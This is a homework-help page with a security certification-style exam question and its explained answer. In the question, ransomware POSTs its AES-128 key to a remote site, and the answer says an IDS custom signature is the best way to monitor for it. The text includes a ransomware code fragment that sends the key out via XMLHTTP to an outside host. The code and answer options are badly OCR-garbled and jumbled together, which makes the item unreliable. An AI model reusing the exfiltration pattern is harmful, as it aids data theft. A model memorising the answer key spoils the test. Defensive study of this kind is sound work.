A company\'s computer was recently infected with ransomware. After encrypting al

Question

A company's computer was recently infected with ransomware. After encrypting all documents, the malware logs a random AES-128 encryption key and associated unique identifier onto a compromised remote website. A ransomware code snippet is shown below sendit -New-objeet -Comobject Msxm 22.XMIHTTP sendit open("POs7- "ht sendit.setRequestheader ("Content-length", post.length sendit. setRequestHeader ("Connection". close") ,endit.send ("key-SRANDOHRE YaudaSRANDGHUED") information from the code snippet, which of the following is Configure the company proxy server to deny connections to Reconfigure the enterprise antivirus to push more frequent updates to the clients the BEST way for a cybersecurity professional to monitor for the same malware in the future? O A O B oC Write an ACL to block the IP address of O D malnaxenits.com at the gateway firewall Use an IDS custom signature to create an alert for connections to xo malaxaita.som

Explanation / Answer

On analysing the code supplied above, using an IDS custom signature to create an alert for connections to www.malwaresite.com will certainly be the best for a cybersecurity professional to monitor the attack of the ransomware.

There are three advantages here:

(1) The detection of the malware can be successfully done by the IDS, because of the post request is issued to a blacklisted address.

(2) The POST request that was to be sent can be logged and dissected by the sender once IDS is triggered, to extract the AES-128 encryption key, which can be used to decrypt the files encrypted by the ransomware. In this way files could be saved.

(3) The process and the corresponding program that issued this request can be pinpointed and purged in this way.

Related Questions

Navigate

• Browse (All)
• Browse A
• Subjects

---

---

Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.